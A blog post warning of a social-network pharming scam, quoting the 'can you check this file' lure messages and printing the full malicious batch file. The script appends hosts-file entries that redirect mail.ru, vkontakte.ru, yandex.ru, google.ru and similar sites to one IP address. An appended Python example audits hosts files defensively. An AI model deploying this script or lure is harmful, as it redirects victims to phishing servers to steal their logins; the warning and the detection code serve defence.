12:37 Pharming in social networks
It seems the next pharming epidemic has started, this time through social networks. On one of the well-known social networking sites (and maybe not just one?), messages like this are being sent to friends through the private messaging system:

"A file I need isn't working for me, can you check it on your machine?"

To which the sender, of course, gets a reply:

"I can, hi)"

And after some time the following message arrives:

"urlshort.me/** does the file run without errors?))"

(The address is deliberately masked with asterisks to discourage clicking :)

As someone taught by life experience (my own included), I followed the link in a browser in incognito mode. The shortened link leads to one of the popular file-sharing services, which offers qip_unfium.bat for download. The unsuspecting user runs this file in order to help a friend deal with the problem with "Unfium", and ... gets the following code:

@rem ----- Exescript Options Begin -----
@rem scriptType: console
@rem DestDirectory: temp
@rem Icon: default
@rem ----- Exescript Options End -----
@echo off
echo 81.94.229.115 www.mail.i.ua>>%windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.i.ua>>%windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.m.vkontakte.ru>>%windir%\system32\drivers\etc\hosts
echo 81.94.229.115 m.vkontakte.ru>>%windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.ru>>%windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.mail.ru>>%windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.yandex.ru>>%windir%\system32\drivers\etc\hosts
echo 81.94.229.115 yandex.ru>>%windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.vkontakte.ru>>%windir%\system32\drivers\etc\hosts
echo 81.94.229.115 vkontakte.ru>>%windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.odnoklasniki.ru>>%windir%\system32\drivers\etc\hosts
echo 81.94.229.115 odnoklasniki.ru>>%windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.google.ru>>%windir%\system32\drivers\etc\hosts
echo 81.94.229.115 google.ru>>%windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.rambler.ru>>%windir%\system32\drivers\etc\hosts
echo 81.94.229.115 rambler.ru>>%windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.ya.ru>>%windir%\system32\drivers\etc\hosts
echo 81.94.229.115 ya.ru>>%windir%\system32\drivers\etc\hosts

By the way, the file has 662 blank lines before the actual body of the script. The consequences of running this script need no explanation.

The moral? A reminder for the hundred-thousandth time: beware of imitations, and check with your friends whether they really sent you the link.

UPD November 16, 2009: The second part of the Marlezon ballet. :-)
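A defensive check for the hosts-file tampering shown above, as an added example that is not part of the original post: it parses hosts-file text and reports every name pinned to a public IP address. The function names are hypothetical, and the sample is constructed, with three entries taken from the batch file above.

```python
import ipaddress
from collections import defaultdict

# Constructed sample: a typical hosts file plus three of the entries the
# batch file above appends (address and names are taken from the page).
SAMPLE_HOSTS = """\
# localhost name resolution is handled within DNS itself.
127.0.0.1 localhost
10.0.0.5 wiki.corp.example   # constructed internal override
0.0.0.0 ads.example          # constructed blocklist entry


81.94.229.115 www.mail.ru
81.94.229.115 mail.ru
81.94.229.115 vkontakte.ru
"""


def parse_hosts(text):
    """Yield (line_number, ip, [hostnames]) for every valid hosts entry."""
    for lineno, raw in enumerate(text.splitlines(), start=1):
        fields = raw.split("#", 1)[0].split()   # drop comments, split on whitespace
        if len(fields) < 2:
            continue                             # blank, comment-only or malformed
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                             # first field is not an address
        yield lineno, ip, [h.lower() for h in fields[1:]]


def audit_hosts(text):
    """Group names pinned to public (globally routable) addresses.
    Loopback, 0.0.0.0 and private-range targets are the usual blocklist or
    intranet overrides; a public target sends that name to a fixed server."""
    findings = defaultdict(list)
    for lineno, ip, hosts in parse_hosts(text):
        if ip.is_global:
            findings[str(ip)].extend((lineno, h) for h in hosts)
    return dict(findings)


if __name__ == "__main__":
    # On a live Windows system, read %windir%\system32\drivers\etc\hosts instead.
    for ip, entries in audit_hosts(SAMPLE_HOSTS).items():
        print(f"{ip}: {len(entries)} name(s) redirected")
        for lineno, host in entries:
            print(f"  line {lineno}: {host}")
```

The reported line numbers matter because appended entries can sit far below the part of the file a user normally looks at.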